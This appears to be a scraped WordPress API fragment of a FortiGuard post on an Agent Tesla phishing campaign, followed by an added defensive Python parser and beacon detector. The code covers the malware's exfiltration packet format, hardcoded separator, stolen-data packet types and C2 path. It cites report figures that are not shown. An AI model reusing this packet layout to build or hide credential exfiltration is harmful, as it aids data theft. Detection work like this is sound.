class=\"text-container\">\n<div id=\"om-qbkzwxxbiv83f0ol5a2d-holder\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p><a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/fortinet\/blog\/threat-research<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image.img.png\/1639164322065\/picture1.png\"\/><br \/>FortiGuard Labs recently caught a phishing campaign that delivers a malicious PowerPoint file spreading a new variant of Agent Tesla. Read to learn more about the malicious macro, payload, and how the malware maintains persistence as well as how it exfiltrates stolen data and credentials.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-17988","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/17988","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=17988"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/17988\/revisions"}],"wp:attachment":[{"href"
:"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=17988"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=17988"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=17988"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
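
The exfiltration packet layout and the packet-type list from the section above (Figures 5.1 and 5.2), as an added Python example that is not part of the original FortiGuard report and not the malware's own code: a defender-side parser that splits a decrypted packet on the hardcoded separator, enforces the per-type rules the report gives (header-only packets "0" to "2", a 32-hex-character MD5 Victim ID, a base64-encoded ZIP for packet "6"), and a check for the 60-second / 120-second beacon cadence of packets "2" and "1" over constructed proxy log lines. The DES layer is deliberately not reproduced because the report gives neither the key, the mode nor the IV, so `parse_packet()` takes the plaintext as it exists after decryption and before the separator split. The date format, the exact hardware string hashed into the Victim ID, the log-line format and all sample values are assumptions; the C2 path is the one listed in the IOCs.

```python
"""Parser and beacon check for the Agent Tesla exfiltration packets described
in the report above.  Added example: not the malware's code, not Fortinet tooling.
The DES/base64 transport layer is left out (key, mode and IV are not in the
report); parse_packet() expects the plaintext that results after decryption.
ASSUMED: date format, hardware string behind the Victim ID, log line format."""
import base64
import hashlib
import io
import zipfile
from datetime import datetime

# Separator string hardcoded in the sample (value taken from the report).
SEPARATOR = "0de264895c1ed90486c73c6eb110af6c2222264a0854b0047b9ead88b718f7d0"
# Packet numbers and meaning, as listed in the report.
PACKET_TYPES = {"0": "startup notice", "1": "heartbeat (every 120 s)",
                "2": "command poll (every 60 s; 'uninstall' in reply)",
                "3": "keystrokes and clipboard", "4": "screenshots",
                "5": "client credentials", "6": "browser cookies (base64 ZIP)"}
HEADER_ONLY = {"0", "1", "2"}          # these carry an empty "data" part
ZIP_MAGIC = b"PK\x03\x04"
C2_PATH = "/webpanel-divine/mawa/7dd66d9f8e1cf61ae198.php"   # from the IOCs
# Constructed proxy log lines (not from the report): 'ISO-time METHOD PATH'.
SAMPLE_LOG = """\
2021-12-09T10:00:00 POST /webpanel-divine/mawa/7dd66d9f8e1cf61ae198.php
2021-12-09T10:00:30 GET /index.html
2021-12-09T10:01:00 POST /webpanel-divine/mawa/7dd66d9f8e1cf61ae198.php
2021-12-09T10:02:01 POST /webpanel-divine/mawa/7dd66d9f8e1cf61ae198.php
2021-12-09T10:03:00 POST /webpanel-divine/mawa/7dd66d9f8e1cf61ae198.php
"""


def victim_id(hardware_info):
    """MD5 over hardware info, as the report describes the Victim ID.
    Which fields the malware concatenates is an assumption."""
    return hashlib.md5(hardware_info.encode()).hexdigest()


def build_packet(packet_no, vid, when, user_computer, data=b""):
    """Lay out the plaintext in the report's order:
    number SEP victim_id SEP date_time SEP user/computer SEP data."""
    if packet_no not in PACKET_TYPES:
        raise ValueError("unknown packet number %r" % packet_no)
    if packet_no in HEADER_ONLY and data:
        raise ValueError("packet %s is header-only" % packet_no)
    if packet_no == "6":               # cookies travel as a base64 ZIP
        data = base64.b64encode(data)
    stamp = when.strftime("%Y-%m-%d %H:%M:%S")   # format is an assumption
    return SEPARATOR.join([packet_no, vid, stamp, user_computer, data.decode()])


def parse_packet(plaintext):
    """Split a decrypted packet on the separator and enforce the per-type
    rules from the report.  Raises ValueError on anything malformed."""
    parts = plaintext.split(SEPARATOR)
    if len(parts) != 5:
        raise ValueError("expected 4 separators, found %d" % (len(parts) - 1))
    number, vid, stamp, user_computer, data = parts
    if number not in PACKET_TYPES:
        raise ValueError("unknown packet number %r" % number)
    if len(vid) != 32 or set(vid) - set("0123456789abcdef"):
        raise ValueError("victim id is not a 32-hex-char MD5")
    if number in HEADER_ONLY and data:
        raise ValueError("packet %s must not carry data" % number)
    payload = data.encode()
    if number == "6":                  # must decode to a ZIP archive
        payload = base64.b64decode(data, validate=True)
        if not payload.startswith(ZIP_MAGIC):
            raise ValueError("packet 6 data is not a ZIP archive")
    return {"number": number, "type": PACKET_TYPES[number], "victim_id": vid,
            "timestamp": stamp, "user_computer": user_computer, "payload": payload}


def is_valid_packet(plaintext):
    """Boolean wrapper around parse_packet() for filtering."""
    try:
        parse_packet(plaintext)
        return True
    except ValueError:
        return False


def make_cookie_zip(files):
    """In-memory ZIP standing in for the stolen cookie files (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


def post_times(log, path):
    """Timestamps of POSTs to `path` from the constructed log format."""
    out = []
    for line in log.splitlines():
        stamp, method, target = line.split()
        if method == "POST" and target == path:
            out.append(datetime.fromisoformat(stamp))
    return out


def beacon_period(timestamps, tolerance_s=2.0):
    """Dominant POST interval in seconds when three consecutive gaps agree
    within tolerance, else None.  Packet 2 polls every 60 s and packet 1
    beats every 120 s, so either cadence to one .php path is worth a look."""
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    for i in range(len(gaps) - 2):
        window = gaps[i:i + 3]
        if max(window) - min(window) <= tolerance_s:
            return int(round(sum(window) / 3))
    return None


def demo():
    """Run the parser and the beacon check over constructed inputs."""
    vid = victim_id("BIOS-1234|CPU-5678|DISK-9ABC")          # constructed
    when = datetime(2021, 12, 9, 10, 0, 0)
    cookies = make_cookie_zip({"Cookies": b"host\tname\tvalue"})
    pkt6 = parse_packet(build_packet("6", vid, when, "user/PC", cookies))
    pkt1 = parse_packet(build_packet("1", vid, when, "user/PC"))
    bogus = SEPARATOR.join(["1", vid, "2021-12-09 10:00:00", "user/PC", "x"])
    return {"cookie_zip_ok": pkt6["payload"] == cookies,
            "heartbeat_type": pkt1["type"],
            "header_only_rejected": not is_valid_packet(bogus),
            "beacon_period": beacon_period(post_times(SAMPLE_LOG, C2_PATH))}


if __name__ == "__main__":
    print(demo())
```

The per-type checks are what make the parser useful on real traffic once the DES layer has been peeled off in a sandbox: a packet "6" whose data does not decode to a ZIP, or a header-only packet that carries data, is either a different variant or not Agent Tesla at all. The beacon check is deliberately loose (three agreeing gaps within two seconds) because the two timers run concurrently, so a capture will show 60-second and 120-second gaps interleaved rather than one clean period.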